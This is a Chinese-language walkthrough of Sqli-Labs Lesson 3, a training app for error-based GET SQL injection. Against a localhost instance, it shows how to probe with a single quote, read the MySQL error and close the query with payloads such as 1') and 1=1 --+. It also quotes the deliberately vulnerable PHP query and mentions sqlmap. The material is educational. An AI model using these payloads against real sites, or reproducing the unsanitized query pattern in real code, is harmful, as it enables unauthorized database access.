Sqli-Labs 是一个印度人的开源项目平台。里面包含了基本的各种注入类型,同时又有get和post类型,以及一些基本的绕过学习。
项目地址:https://github.com/Audi-1/sqli-labs
SQL注入
Lesson-3 #Get - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)
运行测试环境:http://localhost/sqli-labs-master/Less-3/
输入ID参数1:http://localhost/sqli-labs-master/Less-3/?id=1 ,返回正常,继续测试陆续输入2,3,4,5,6....,均返回正常,而且随着参数ID值的改变,页面返回的name和Password的值也会出现不同。
id=1
我输入单引号进行测试:
【 http://localhost/sqli-labs-master/Less-3/?id=1%27 】
网站报出错误信息:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
单引号报错
根据报错的SQL语法信息:
' ' 1' ') LIMIT 0,1 '
推测SQL语句中含有(),尝试闭合:
select * from table where id = ('$ID')
当输入1' )and ('1'='1,则SQL语句变成:
select * from table where id = ('1' )and ('1'='1')
闭合SQL语句成功
除此之外,也可以尝试截断SQL语句
当输入1') and 1=1 --+,则SQL语句变成:
select * from table where id = ('1') and 1=1 --+')
截断SQL语句成功
查看源码:
index.php
重点关注这段SQL查询语句:
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
通过网站的报错信息可以慢慢推断网站所用的SQL语句,在进行构造注入。
继续测试一下:
查询
使用SQLMAP来测试一下:
sqlmap结果
SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。
